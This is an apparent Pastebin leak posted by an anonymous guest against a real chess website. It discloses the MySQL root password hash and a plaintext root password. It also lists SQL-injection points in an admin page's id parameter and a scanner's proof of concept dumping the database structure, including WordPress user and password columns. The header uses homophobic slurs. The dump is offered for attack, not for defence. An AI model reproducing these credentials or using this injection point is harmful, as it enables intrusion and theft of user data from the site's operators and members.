Guest User

http://xqfan.com/ leaked

a guest
Nov 1st, 2014
209
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.44 KB | None | 0 0
  1.  
  2.  
  3. http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
  4. Version 5.5.38-0ubuntu0.12.04.1
  5. Server Apache/2.2.22 (Ubuntu)
  6. OS debian-linux-gnu
  7. user root@localhost
  8. Database xqfan
  9. root_PasswordHash 317E9221C707F3F74E0B9CAA6AEB40AA63521E48
  10. root password minh08
  11.  
  12. http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
  13. Version 5.5.38-0ubuntu0.12.04.1
  14. Server Apache/2.2.22 (Ubuntu)
  15. OS debian-linux-gnu
  16. user root@localhost
  17. Database xqfan
  18. half of* root_PasswordHash *317E9221C707F3F74E0B9CAA6AEB40AA63521E48
  19. ----------------------------------------------------------------------------------
  20.  
  21. Vulnerability Result
  22.  
  23. No. 1
  24. ReferURL http://xqfan.com/vn/admin1.php?id=622
  25. Parameter id=622
  26. Type Integer
  27. KWordActionURL Hướng
  28. Vulnerability URL SQL INJECTION
  29. ----------------------------------------------------------------------------------
  30.  
  31. No. 2
  32. ReferURL http://xqfan.com/vn/admin1.php?id=99999999
  33. Parameter id=99999999
  34. Type Integer
  35. KWordActionURL thuật
  36. Vulnerability URL SQL INJECTION
  37. ----------------------------------------------------------------------------------
  38.  
  39. No. 3
  40. ReferURL http://xqfan.com/vn/admin1.php?id=
  41. Parameter id=
  42. Type Search
  43. KWordActionURL ChessFriends
  44. Vulnerability URL SQL INJECTION
  45. ----------------------------------------------------------------------------------
  46.  
  47. Proof Of Concept - SQL INJECTION
  48.  
  49. Parameter Value
  50. URL http://xqfan.com/vn/admin1.php?id=622
  51. RequestType GET
  52. DatabaseType MySQL
  53. InjectionType Integer
  54. GettingDataBy FieldEcho
  55. ----------------------------------------------------------------------------------
  56.  
  57. Proof Of Concept - Getting Database Structure
  58.  
  59. DB-----Table---Column
  60. mysql
  61. db
  62. Db
  63. Host
  64. Insert_priv
  65. Update_priv
  66. User
  67. Grant_priv
  68. Index_priv
  69. Drop_priv
  70. Event_priv
  71. Create_priv
  72. Delete_priv
  73. Create_tmp_table_priv
  74. Alter_priv
  75. Create_view_priv
  76. Show_view_priv
  77. Select_priv
  78. Execute_priv
  79. Alter_routine_priv
  80. Create_routine_priv
  81. Trigger_priv
  82. Lock_tables_priv
  83. References_priv
  84. help_category
  85. help_keyword
  86. proc
  87. servers
  88. event
  89. proxies_priv
  90. slow_log
  91. plugin
  92. columns_priv
  93. procs_priv
  94. general_log
  95. ndb_binlog_index
  96. func
  97. time_zone
  98. help_topic
  99. time_zone_transition
  100. host
  101. user
  102. time_zone_leap_second
  103. tables_priv
  104. Db
  105. Grantor
  106. Table_name
  107. Column_priv
  108. Host
  109. Table_priv
  110. User
  111. Timestamp
  112. help_relation
  113. time_zone_name
  114. time_zone_transition_type
  115. db
  116. func
  117. event
  118. help_topic
  119. proc
  120. servers
  121. procs_priv
  122. host
  123. ndb_binlog_index
  124. help_keyword
  125. slow_log
  126. user
  127. help_category
  128. general_log
  129. columns_priv
  130. help_relation
  131. tables_priv
  132. plugin
  133. proxies_priv
  134. time_zone_name
  135. time_zone
  136. time_zone_leap_second
  137. time_zone_transition
  138. time_zone_transition_type
  139. nctg
  140. xqfan
  141. phpmyadmin
  142. pma_relation
  143. pma_history
  144. pma_pdf_pages
  145. pma_bookmark
  146. pma_table_coords
  147. pma_column_info
  148. pma_tracking
  149. pma_designer_coords
  150. pma_table_info
  151. pma_userconfig
  152. pma_tracking
  153. pma_designer_coords
  154. pma_pdf_pages
  155. pma_column_info
  156. pma_userconfig
  157. pma_relation
  158. pma_bookmark
  159. pma_table_coords
  160. pma_history
  161. pma_table_info
  162. wordpress
  163. nctgforums
  164. softgaroo
  165. xqsun
  166. wp_comments
  167. wp_terms
  168. wp_links
  169. wp_posts
  170. wp_users
  171. ID
  172. user_login
  173. user_url
  174. user_activation_key
  175. user_status
  176. user_nicename
  177. user_email
  178. display_name
  179. user_pass
  180. user_registered
  181. wp_commentmeta
  182. wp_options
  183. wp_postmeta
  184. wp_usermeta
  185. wp_term_taxonomy
  186. wp_term_relationships
  187. information_schema
  188. performance_schema
  189.  
  190.  
  191. ----------------------------------------------------------------------------------
  192.  
  193. Vulnerability Result
  194.  
  195. No. 1
  196. ReferURL http://xqfan.com/vn/admin1.php?id=622
  197. Parameter id=622
  198. Type Integer
  199. KWordActionURL Hướng
  200. Vulnerability URL SQL INJECTION
  201. ----------------------------------------------------------------------------------
  202.  
  203. No. 2
  204. ReferURL http://xqfan.com/vn/admin1.php?id=99999999
  205. Parameter id=99999999
  206. Type Integer
  207. KWordActionURL thuật
  208. Vulnerability URL SQL INJECTION
  209. ----------------------------------------------------------------------------------
  210.  
  211. No. 3
  212. ReferURL http://xqfan.com/vn/admin1.php?id=
  213. Parameter id=
  214. Type Search
  215. KWordActionURL ChessFriends
  216. Vulnerability URL SQL INJECTION
  217. ----------------------------------------------------------------------------------
  218.  
  219. Proof Of Concept - SQL INJECTION
  220.  
  221. Parameter Value
  222. URL http://xqfan.com/vn/admin1.php?id=622
  223. RequestType GET
  224. DatabaseType MySQL
  225. InjectionType Integer
  226. GettingDataBy FieldEcho
  227. ----------------------------------------------------------------------------------
  228.  
  229. Proof Of Concept - Getting Database Structure
  230.  
  231. DB-----Table---Column
  232. mysql
  233. db
  234. Db
  235. Host
  236. Insert_priv
  237. Update_priv
  238. User
  239. Grant_priv
  240. Index_priv
  241. Drop_priv
  242. Event_priv
  243. Create_priv
  244. Delete_priv
  245. Create_tmp_table_priv
  246. Alter_priv
  247. Create_view_priv
  248. Show_view_priv
  249. Select_priv
  250. Execute_priv
  251. Alter_routine_priv
  252. Create_routine_priv
  253. Trigger_priv
  254. Lock_tables_priv
  255. References_priv
  256. help_category
  257. help_keyword
  258. proc
  259. servers
  260. event
  261. proxies_priv
  262. slow_log
  263. plugin
  264. columns_priv
  265. procs_priv
  266. general_log
  267. ndb_binlog_index
  268. func
  269. time_zone
  270. help_topic
  271. time_zone_transition
  272. host
  273. user
  274. time_zone_leap_second
  275. tables_priv
  276. Db
  277. Grantor
  278. Table_name
  279. Column_priv
  280. Host
  281. Table_priv
  282. User
  283. Timestamp
  284. help_relation
  285. time_zone_name
  286. time_zone_transition_type
  287. db
  288. func
  289. event
  290. help_topic
  291. proc
  292. servers
  293. procs_priv
  294. host
  295. ndb_binlog_index
  296. help_keyword
  297. slow_log
  298. user
  299. help_category
  300. general_log
  301. columns_priv
  302. help_relation
  303. tables_priv
  304. plugin
  305. proxies_priv
  306. time_zone_name
  307. time_zone
  308. time_zone_leap_second
  309. time_zone_transition
  310. time_zone_transition_type
  311. nctg
  312. xqfan
  313. phpmyadmin
  314. pma_relation
  315. pma_history
  316. pma_pdf_pages
  317. pma_bookmark
  318. pma_table_coords
  319. pma_column_info
  320. pma_tracking
  321. pma_designer_coords
  322. pma_table_info
  323. pma_userconfig
  324. pma_tracking
  325. pma_designer_coords
  326. pma_pdf_pages
  327. pma_column_info
  328. pma_userconfig
  329. pma_relation
  330. pma_bookmark
  331. pma_table_coords
  332. pma_history
  333. pma_table_info
  334. wordpress
  335. nctgforums
  336. softgaroo
  337. xqsun
  338. wp_comments
  339. wp_terms
  340. wp_links
  341. wp_posts
  342. wp_users
  343. ID
  344. user_login
  345. user_url
  346. user_activation_key
  347. user_status
  348. user_nicename
  349. user_email
  350. display_name
  351. user_pass
  352. user_registered
  353. wp_commentmeta
  354. wp_options
  355. wp_postmeta
  356. wp_usermeta
  357. wp_term_taxonomy
  358. wp_term_relationships
  359. information_schema
  360. performance_schema
Add Comment
Please, Sign In to add comment